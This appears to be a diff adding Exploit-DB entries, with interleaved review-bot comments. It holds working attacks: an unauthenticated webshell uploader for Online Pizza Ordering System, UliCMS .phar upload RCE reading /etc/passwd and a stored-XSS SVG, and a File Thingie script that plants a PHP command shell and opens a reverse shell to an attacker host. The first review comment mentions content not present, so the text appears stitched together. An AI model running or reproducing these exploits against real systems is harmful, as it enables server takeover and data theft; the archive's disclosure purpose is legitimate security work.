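Review bot: The second `CVSS vector` line (`3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N`) is missing the `CVSS:` prefix, is version 3.0 where the first is 3.1, and sets `PR:L` although the description says "remote users" and the sample `GET` carries no credentials. Two advisories with separate `# Vulnerability Type:` headers share one file; splitting them would let each carry its own CWE and score. The whole file has been hard-wrapped at mail width, which has broken the header title, the request lines, the Python listing and the `win.ini` response body; commit the unwrapped original.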

74
exploits/php/webapps/51431.py Executable file
@ -0,0 +1,74 @@
# Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload
# Date: 03/05/2023
# Exploit Author: URGAN
# Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip
# Version: v1.0
# Tested on: LAMP Fedora Server 27 (Twenty Seven) Apache/2.4.34 (Fedora) 10.2.19-MariaDB PHP 7.1.23
# CVE: CVE-2023-2246
#!/usr/bin/env python3
# coding: utf-8
import os
import requests
import argparse
from bs4 import BeautifulSoup
# command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', type=str, help='URL with http://')
parser.add_argument('-p', '--payload', type=str, help='PHP webshell')
args = parser.parse_args()
# if no arguments are passed, ask the user for them
if not (args.url and args.payload):
args.url = input('Enter URL with http://: ')
args.payload = input('Enter file path PHP webshell: ')
# URL Variables
url = args.url + '/admin/ajax.php?action=save_settings'
img_url = args.url + '/assets/img/'
filename = os.path.basename(args.payload)
files = [
('img',(filename,open(args.payload,'rb'),'application/octet-stream'))
]
# send a POST request to the server
resp_upl = requests.post(url, files = files)
status_code = resp_upl.status_code
if status_code == 200:
print('[+] File uploaded')
else:
print(f'[-] Error {status_code}: {resp_upl.text}')
raise SystemExit(f'[-] Script stopped due to error {status_code}.')
# send a GET request to the server
resp_find = requests.get(img_url)
# Use BeautifulSoup to parse the page's HTML code
soup = BeautifulSoup(resp_find.text, 'html.parser')
# get all <a> tags on a page
links = soup.find_all('a')
# list to store found files
found_files = []
# we go through all the links and look for the desired file by its name
for link in links:
file_upl = link.get('href')
if file_upl.endswith(filename): # uploaded file name
print('[+] Uploaded file found:', file_upl)
file_url = img_url + file_upl # get the full URL of your file
found_files.append(file_url) # add the file to the list of found files
# if the list is not empty, then display all found files
if found_files:
print('[+] Full URL of your file:')
for file_url in found_files:
print('[+] ' + file_url)
else:
print('[-] File not found')
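
Review bot: The metadata comments sit above `#!/usr/bin/env python3` and `# coding: utf-8`, so neither line is in a position where it takes effect; move both to the top of the file. `open(args.payload,'rb')` is never closed, and `link.get('href')` can return `None`, which makes `file_upl.endswith(filename)` raise. The check at the end depends on `/assets/img/` returning a directory index, which the header does not mention; say so, since disabling auto-indexing changes the script's result without fixing the upload.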

@ -0,0 +1,151 @@
#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)
#Application: Ulicms
#Version: 2023.1-sniffing-vicuna
#Bugs: RCE
#Technology: PHP
#Vendor URL: https://en.ulicms.de/
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
#Date of found: 04-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Login to account and edit profile.
2.Upload new Avatar
3. It is possible to include the php file with the phar extension when uploading the image. Rce is triggered when we visit it again. File upload error may occur, but this does not mean that the file is not uploaded and the file location is shown in the error
payload: <?php echo system("cat /etc/passwd"); ?>
poc request :
POST /dist/admin/index.php HTTP/1.1
Host: localhost
Content-Length: 1982
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv
Connection: close
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="csrf_token"
e2d428bc0585c06c651ca8b51b72fa58
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="sClass"
UserController
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="sMethod"
update
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="avatar"; filename="salam.phar"
Content-Type: application/octet-stream
<?php echo system("cat /etc/passwd"); ?>
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="edit_admin"
edit_admin
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="id"
12
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="firstname"
account1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="lastname"
account1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="email"
account1@test.com
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="password"
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="password_repeat"
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="group_id"
1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="secondary_groups[]"
1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="homepage"
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="html_editor"
ckeditor
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="admin"
1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="default_language"
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="about_me"
------WebKitFormBoundaryYB7QS1BMMo1CXZVy--
response:
Error
GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67
Stack trace:
#0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct()
#1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()
#2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()
#3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()
#4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()
#5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()
#6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()
#7 {main}
Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73
Stack trace:
#0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()
#1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()
#2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()
#3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()
#4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()
#5 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()
#6 {main}
4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)
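Review bot: the write-up ends at step 4 without naming the root cause or a fix, although the response block already shows both. The trace has `User->processAvatar()` handing `/var/www/html/dist/content/tmp/645364e62615b.phar` to `Imagine->open()`, so the upload is written under the web-served `content/tmp/` with the client-supplied `.phar` extension before it is checked as an image, and step 4 shows it is still reachable after the decode fails. Suggest adding a short remediation paragraph: take the extension from the verified image type or keep the temporary file outside the document root, delete the temporary file when `open()` throws, and stop returning the exception and its paths to the client. The `Cookie:` and `csrf_token` values in the request should be replaced with placeholders.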


@ -0,0 +1,75 @@
#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)
#Application: Ulicms
#Version: 2023.1-sniffing-vicuna
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: https://en.ulicms.de/
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
#Date of found: 04-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)
2. upload malicious svg file
svg file content ===>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
poc request:
POST /dist/admin/fm/upload.php HTTP/1.1
Host: localhost
Content-Length: 663
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABCl
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/dist/admin/fm/dialog.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv
Connection: close
------WebKitFormBoundaryK3CvcSs8xZwzABCl
Content-Disposition: form-data; name="fldr"
------WebKitFormBoundaryK3CvcSs8xZwzABCl
Content-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
------WebKitFormBoundaryK3CvcSs8xZwzABCl--
3. Go to http://localhost/dist/content/SVG_XSS.svg
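Review bot: the body starts at "2. Technical Details & POC" with no section 1, so the entry never states the impact, and the same SVG is pasted twice (under "svg file content" and again inside the request). Suggest adding a short description: the file is served back from `/dist/content/SVG_XSS.svg` on the same host as `/dist/admin/`, so the embedded `<script>` runs in that origin for anyone who opens the link. A mitigation line would help defenders, for example serving uploads with `Content-Disposition: attachment` or a restrictive `Content-Security-Policy`, or rejecting SVG that contains script. The session cookie in the request should be a placeholder.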

exploits/php/webapps/51436.py Executable file

@ -0,0 +1,189 @@
#!/usr/bin/python
# Exploit Title: File Thingie 2.5.7 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 27th of April, 2023
# Exploit Author: Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
# Software Link: https://github.com/leefish/filethingie
# Version: 2.5.7
# Tested on: N/A
# CVE: N/A
# Vulnerability originally discovered / published by Cakes
# Reference: https://www.exploit-db.com/exploits/47349
# Run a local listener on your machine and youre good to go
import os
import argparse
import requests
import random
import string
import zipfile
from urllib.parse import urlsplit, urlunsplit, quote
class Exploit:
def __init__(self, target, username, password, lhost, lport):
self.target = target
self.username = username
self.password = password
self.lhost = lhost
self.lport = lport
def try_login(self) -> bool:
self.session = requests.Session()
post_body = {"ft_user": f"{self.username}", "ft_pass": f"{self.password}", "act": "dologin"}
response = self.session.post(self.target, data=post_body)
if response.status_code == 404:
print(f"[-] 404 Not Found - The requested resource {self.target} was not found")
return False
elif response.status_code == 200:
if "Invalid username or password" in response.text:
print(f"Invalid username or password")
return False
return True
def create_new_folder(self) -> bool:
# Generate random string
letters = string.ascii_letters
self.payload_filename = "".join(random.choice(letters) for i in range(16))
headers = {"Content-Type": "application/x-www-form-urlencoded"}
post_body = {f"type": "folder", "newdir": f"{self.payload_filename}", "act": "createdir", "dir": "", "submit" :"Ok"}
print(f"[*] Creating new folder /{self.payload_filename}")
response = self.session.post(self.target, headers=headers, data=post_body)
if f"index.php?dir=/{self.payload_filename}" in response.text:
print(f"[+] Created new folder /{self.payload_filename}")
return True
else:
print(f"[-] Could not create new folder /{self.payload_filename}")
return False
def create_payload(self) -> bool:
try:
with zipfile.ZipFile(f"{self.payload_filename}.zip", 'w', compression=zipfile.ZIP_DEFLATED) as zip_file:
zip_file.writestr(f"{self.payload_filename}.php", "<?php if(isset($_REQUEST[\'cmd\'])){ echo \"<pre>\"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo \"</pre>\"; die; }?>")
print(f"[+] Zipped payload to {self.payload_filename}.zip")
return True
except:
print(f"[-] Could not create payload to {self.payload_filename}.zip")
return False
def upload_payload(self) -> bool:
# Set up the HTTP headers and data for the request
headers = {
b'Content-Type': b'multipart/form-data; boundary=---------------------------grimlockx'
}
post_body = (
'-----------------------------grimlockx\r\n'
'Content-Disposition: form-data; name="localfile-1682513975953"; filename=""\r\n'
'Content-Type: application/octet-stream\r\n\r\n'
)
post_body += (
'\r\n-----------------------------grimlockx\r\n'
'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n'
'2000000\r\n'
'-----------------------------grimlockx\r\n'
f'Content-Disposition: form-data; name="localfile"; filename="{self.payload_filename}.zip"\r\n'
'Content-Type: application/zip\r\n\r\n'
)
# Read the zip file contents and append them to the data
with open(f"{self.payload_filename}.zip", "rb") as f:
post_body += ''.join(map(chr, f.read()))
post_body += (
'\r\n-----------------------------grimlockx\r\n'
'Content-Disposition: form-data; name="act"\r\n\r\n'
'upload\r\n'
'-----------------------------grimlockx\r\n'
'Content-Disposition: form-data; name="dir"\r\n\r\n'
f'/{self.payload_filename}\r\n'
'-----------------------------grimlockx\r\n'
'Content-Disposition: form-data; name="submit"\r\n\r\n'
'Upload\r\n'
'-----------------------------grimlockx--\r\n'
)
print("[*] Uploading payload to the target")
response = self.session.post(self.target, headers=headers, data=post_body)
if f"<a href=\"./{self.payload_filename}/{self.payload_filename}.zip\" title=\"Show {self.payload_filename}.zip\">{self.payload_filename}.zip</a>" in response.text:
print("[+] Uploading payload successful")
return True
else:
print("[-] Uploading payload failed")
return False
def get_base_url(self) -> str:
url_parts = urlsplit(self.target)
path_parts = url_parts.path.split('/')
path_parts.pop()
base_url = urlunsplit((url_parts.scheme, url_parts.netloc, '/'.join(path_parts), "", ""))
return base_url
def unzip_payload(self) -> bool:
print("[*] Unzipping payload")
headers = {"Content-Type": "application/x-www-form-urlencoded"}
post_body = {"newvalue": f"{self.payload_filename}.zip", "file": f"{self.payload_filename}.zip", "dir": f"/{self.payload_filename}", "act": "unzip"}
response = self.session.post(f"{self.target}", headers=headers, data=post_body)
if f"<p class='ok'>{self.payload_filename}.zip unzipped.</p>" in response.text:
print("[+] Unzipping payload successful")
print(f"[+] You can now execute commands by opening {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>")
return True
else:
print("[-] Unzipping payload failed")
return False
def execute_payload(self) -> bool:
print("[*] Trying the get a reverse shell")
cmd = quote(f"php -r \'$sock=fsockopen(\"{self.lhost}\",{self.lport});system(\"/bin/bash <&3 >&3 2>&3\");\'")
print("[*] Executing payload")
response = self.session.get(f"{self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd={cmd}")
print("[+] Exploit complete")
return True
def cleanup_local_files(self) -> bool:
if os.path.exists(f"{self.payload_filename}.zip"):
os.remove(f"{self.payload_filename}.zip")
print("[+] Cleaned up zipped payload on local machine")
return True
print("[-] Could not clean up zipped payload on local machine")
return False
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", dest="target", type=str, required=True, help="Target URL to ft2.php")
parser.add_argument("-u", "--username", dest="username", type=str, required=True, help="FileThingie username")
parser.add_argument("-p", "--password", dest="password", type=str, required=True, help="FileThingie password")
parser.add_argument("-L", "--LHOST", dest="lhost", type=str, required=True, help="Local listener ip")
parser.add_argument("-P", "-LPORT", dest="lport", type=int, required=True, help="Local listener port")
args = parser.parse_args()
exploit = Exploit(args.target, args.username, args.password, args.lhost, args.lport)
exploit.try_login()
exploit.create_new_folder()
exploit.create_payload()
exploit.upload_payload()
exploit.unzip_payload()
exploit.execute_payload()
exploit.cleanup_local_files()
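Review bot: in the `__main__` block every step is called unconditionally although each method returns a bool, so a failed `try_login()` or `upload_payload()` is still followed by the remaining requests and `execute_payload()` prints "[+] Exploit complete" regardless. Check each result and stop on the first `False`, and put `cleanup_local_files()` in a `finally` so the local zip is removed on failure too. `try_login()` also returns `True` for any status other than 404 or a 200 containing the error string, and `create_payload()` hides the cause behind a bare `except:`. The header comment should state that the folder, zip and `.php` file created on the target are never removed, since only the local zip is cleaned up and anyone running this in an authorised test leaves a command-execution page behind. The `-LPORT` option has one dash where `--LHOST` has two.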


@ -10292,6 +10292,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49195,exploits/multiple/local/49195.js,"Chromium 83 - Full CSP Bypass",2020-12-04,"Gal Weizman",local,multiple,,2020-12-04,2020-12-04,0,CVE-2020-6519,,,,, 49195,exploits/multiple/local/49195.js,"Chromium 83 - Full CSP Bypass",2020-12-04,"Gal Weizman",local,multiple,,2020-12-04,2020-12-04,0,CVE-2020-6519,,,,,
19821,exploits/multiple/local/19821.c,"Citrix Metaframe 1.0/1.8 - Weak Encryption",2000-03-29,"Dug Song",local,multiple,,2000-03-29,2012-07-14,1,CVE-2000-0244;OSVDB-6335,,,,,https://www.securityfocus.com/bid/1077/info 19821,exploits/multiple/local/19821.c,"Citrix Metaframe 1.0/1.8 - Weak Encryption",2000-03-29,"Dug Song",local,multiple,,2000-03-29,2012-07-14,1,CVE-2000-0244;OSVDB-6335,,,,,https://www.securityfocus.com/bid/1077/info
40686,exploits/multiple/local/40686.txt,"Citrix Receiver/Receiver Desktop Lock 4.5 - Authentication Bypass",2016-11-02,"Rithwik Jayasimha",local,multiple,,2016-11-02,2016-11-02,0,CVE-2016-9111,,,,, 40686,exploits/multiple/local/40686.txt,"Citrix Receiver/Receiver Desktop Lock 4.5 - Authentication Bypass",2016-11-02,"Rithwik Jayasimha",local,multiple,,2016-11-02,2016-11-02,0,CVE-2016-9111,,,,,
51432,exploits/multiple/local/51432.txt,"Codigo Markdown Editor v1.0.1 (Electron) - Remote Code Execution",2023-05-05,8bitsec,local,multiple,,2023-05-05,2023-05-05,0,,,,,,
19498,exploits/multiple/local/19498.sh,"Common Desktop Environment 2.1 20 / Solaris 7.0 - 'dtspcd' Local Privilege Escalation",1999-09-13,"Job de Haas of ITSX",local,multiple,,1999-09-13,2017-11-22,1,CVE-1999-0689;OSVDB-1072,,,,,https://www.securityfocus.com/bid/636/info 19498,exploits/multiple/local/19498.sh,"Common Desktop Environment 2.1 20 / Solaris 7.0 - 'dtspcd' Local Privilege Escalation",1999-09-13,"Job de Haas of ITSX",local,multiple,,1999-09-13,2017-11-22,1,CVE-1999-0689;OSVDB-1072,,,,,https://www.securityfocus.com/bid/636/info
22727,exploits/multiple/local/22727.pl,"Computer Associates - Unicenter Asset Manager Stored Secret Data Decryption",2003-03-19,kufumo.com,local,multiple,,2003-03-19,2012-11-15,1,OSVDB-3242,,,,,https://www.securityfocus.com/bid/7808/info 22727,exploits/multiple/local/22727.pl,"Computer Associates - Unicenter Asset Manager Stored Secret Data Decryption",2003-03-19,kufumo.com,local,multiple,,2003-03-19,2012-11-15,1,OSVDB-3242,,,,,https://www.securityfocus.com/bid/7808/info
48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,,2020-03-10,2020-03-10,0,,,,http://www.exploit-db.com/screenshots/idlt48500/1-0simwojvzjsolm4job-l5w.png,,https://medium.com/@stdio__/cs-go-0days-or-why-all-or-nothing-bug-bounty-programs-are-bad-cce144a5013 48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,,2020-03-10,2020-03-10,0,,,,http://www.exploit-db.com/screenshots/idlt48500/1-0simwojvzjsolm4job-l5w.png,,https://medium.com/@stdio__/cs-go-0days-or-why-all-or-nothing-bug-bounty-programs-are-bad-cce144a5013
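Review bot: the added 51432 row titles the entry "Remote Code Execution" while its type column is `local`; one of the two should change so that a search by type and a search by title agree. If the code runs only when a user opens crafted content in the editor, "Arbitrary Code Execution" in the description fits `local` better.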
@ -15725,6 +15726,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41303,exploits/php/webapps/41303.txt,"CLUB-8 EMS - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php,,2017-02-10,2017-02-10,0,,,,,, 41303,exploits/php/webapps/41303.txt,"CLUB-8 EMS - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php,,2017-02-10,2017-02-10,0,,,,,,
38740,exploits/php/webapps/38740.txt,"cm3 Acora CMS - 'top.aspx' Information Disclosure",2013-08-26,"Pedro Andujar",webapps,php,,2013-08-26,2015-11-17,1,CVE-2013-4727;OSVDB-96666,,,,,https://www.securityfocus.com/bid/62010/info 38740,exploits/php/webapps/38740.txt,"cm3 Acora CMS - 'top.aspx' Information Disclosure",2013-08-26,"Pedro Andujar",webapps,php,,2013-08-26,2015-11-17,1,CVE-2013-4727;OSVDB-96666,,,,,https://www.securityfocus.com/bid/62010/info
2897,exploits/php/webapps/2897.txt,"CM68 News 12.02.06 - 'addpth' Remote File Inclusion",2006-12-08,"Paul Bakoyiannis",webapps,php,,2006-12-07,,1,OSVDB-32142;CVE-2006-6544;OSVDB-32141;CVE-2006-6462,,,,, 2897,exploits/php/webapps/2897.txt,"CM68 News 12.02.06 - 'addpth' Remote File Inclusion",2006-12-08,"Paul Bakoyiannis",webapps,php,,2006-12-07,,1,OSVDB-32142;CVE-2006-6544;OSVDB-32141;CVE-2006-6462,,,,,
51422,exploits/php/webapps/51422.txt,"Cmaps v8.0 - SQL injection",2023-05-05,"Lucas Noki (0xPrototype)",webapps,php,,2023-05-05,2023-05-05,0,CVE-2023-29809,,,,,
6313,exploits/php/webapps/6313.txt,"CMME 1.12 - Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory",2008-08-26,SirGod,webapps,php,,2008-08-25,2016-12-20,1,OSVDB-48103;CVE-2008-3926;OSVDB-48102;CVE-2008-3925;OSVDB-48101;CVE-2008-3924;OSVDB-48100;OSVDB-48099;CVE-2008-3923;OSVDB-48098,,,,, 6313,exploits/php/webapps/6313.txt,"CMME 1.12 - Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory",2008-08-26,SirGod,webapps,php,,2008-08-25,2016-12-20,1,OSVDB-48103;CVE-2008-3926;OSVDB-48102;CVE-2008-3925;OSVDB-48101;CVE-2008-3924;OSVDB-48100;OSVDB-48099;CVE-2008-3923;OSVDB-48098,,,,,
5905,exploits/php/webapps/5905.txt,"cmreams CMS 1.3.1.1 beta2 - Local File Inclusion / Cross-Site Scripting",2008-06-22,CraCkEr,webapps,php,,2008-06-21,2016-12-09,1,OSVDB-46868;CVE-2008-2985;OSVDB-46866;CVE-2008-2984,,,,http://www.exploit-db.comcmreams_1-3-1-1_beta-2.zip, 5905,exploits/php/webapps/5905.txt,"cmreams CMS 1.3.1.1 beta2 - Local File Inclusion / Cross-Site Scripting",2008-06-22,CraCkEr,webapps,php,,2008-06-21,2016-12-09,1,OSVDB-46868;CVE-2008-2985;OSVDB-46866;CVE-2008-2984,,,,http://www.exploit-db.comcmreams_1-3-1-1_beta-2.zip,
12333,exploits/php/webapps/12333.txt,"cms (id) 5.0 - SQL Injection",2010-04-22,spykit,webapps,php,,2010-04-21,,0,CVE-2009-2439;OSVDB-55785,,,,, 12333,exploits/php/webapps/12333.txt,"cms (id) 5.0 - SQL Injection",2010-04-22,spykit,webapps,php,,2010-04-21,,0,CVE-2009-2439;OSVDB-55785,,,,,
@ -17458,6 +17460,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38438,exploits/php/webapps/38438.txt,"EasyPHP - '/index.php' Authentication Bypass / Remote PHP Code Injection",2013-04-09,KedAns-Dz,webapps,php,,2013-04-09,2015-10-10,1,,,,,,https://www.securityfocus.com/bid/58945/info 38438,exploits/php/webapps/38438.txt,"EasyPHP - '/index.php' Authentication Bypass / Remote PHP Code Injection",2013-04-09,KedAns-Dz,webapps,php,,2013-04-09,2015-10-10,1,,,,,,https://www.securityfocus.com/bid/58945/info
37023,exploits/php/webapps/37023.txt,"EasyPHP - 'main.php' SQL Injection",2012-03-29,"Skote Vahshat",webapps,php,,2012-03-29,2015-05-16,1,,,,,,https://www.securityfocus.com/bid/52781/info 37023,exploits/php/webapps/37023.txt,"EasyPHP - 'main.php' SQL Injection",2012-03-29,"Skote Vahshat",webapps,php,,2012-03-29,2015-05-16,1,,,,,,https://www.securityfocus.com/bid/52781/info
40809,exploits/php/webapps/40809.txt,"EasyPHP Devserver 16.1.1 - Cross-Site Request Forgery / Remote Command Execution",2016-11-22,hyp3rlinx,webapps,php,,2016-11-22,2016-11-22,1,,,,,http://www.exploit-db.comEasyPHP-Devserver-16.1.1-setup.exe, 40809,exploits/php/webapps/40809.txt,"EasyPHP Devserver 16.1.1 - Cross-Site Request Forgery / Remote Command Execution",2016-11-22,hyp3rlinx,webapps,php,,2016-11-22,2016-11-22,1,,,,,http://www.exploit-db.comEasyPHP-Devserver-16.1.1-setup.exe,
51430,exploits/php/webapps/51430.txt,"EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and Path Traversal)",2023-05-05,"Rafael Pedrero",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
25928,exploits/php/webapps/25928.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'calendar.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",webapps,php,,2005-07-04,2013-06-04,1,CVE-2005-2155;OSVDB-17723,,,,,https://www.securityfocus.com/bid/14131/info 25928,exploits/php/webapps/25928.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'calendar.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",webapps,php,,2005-07-04,2013-06-04,1,CVE-2005-2155;OSVDB-17723,,,,,https://www.securityfocus.com/bid/14131/info
25931,exploits/php/webapps/25931.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'datePicker.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",webapps,php,,2005-07-04,2013-06-04,1,CVE-2005-2155;OSVDB-17733,,,,,https://www.securityfocus.com/bid/14131/info 25931,exploits/php/webapps/25931.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'datePicker.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",webapps,php,,2005-07-04,2013-06-04,1,CVE-2005-2155;OSVDB-17733,,,,,https://www.securityfocus.com/bid/14131/info
25930,exploits/php/webapps/25930.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'header.inc.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",webapps,php,,2005-07-04,2013-06-04,1,CVE-2005-2155;OSVDB-17732,,,,,https://www.securityfocus.com/bid/14131/info 25930,exploits/php/webapps/25930.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'header.inc.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",webapps,php,,2005-07-04,2013-06-04,1,CVE-2005-2155;OSVDB-17732,,,,,https://www.securityfocus.com/bid/14131/info
@ -18250,6 +18253,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
12763,exploits/php/webapps/12763.txt,"File Share scriptFile share - SQL Injection",2010-05-27,MouDy-Dz,webapps,php,,2010-05-26,,0,,,,,, 12763,exploits/php/webapps/12763.txt,"File Share scriptFile share - SQL Injection",2010-05-27,MouDy-Dz,webapps,php,,2010-05-26,,0,,,,,,
6040,exploits/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injections",2008-07-11,"Nu Am Bani",webapps,php,,2008-07-10,2016-12-14,1,OSVDB-23864;CVE-2006-1278;OSVDB-23863,,,,http://www.exploit-db.comfilestore.zip, 6040,exploits/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injections",2008-07-11,"Nu Am Bani",webapps,php,,2008-07-10,2016-12-14,1,OSVDB-23864;CVE-2006-1278;OSVDB-23863,,,,http://www.exploit-db.comfilestore.zip,
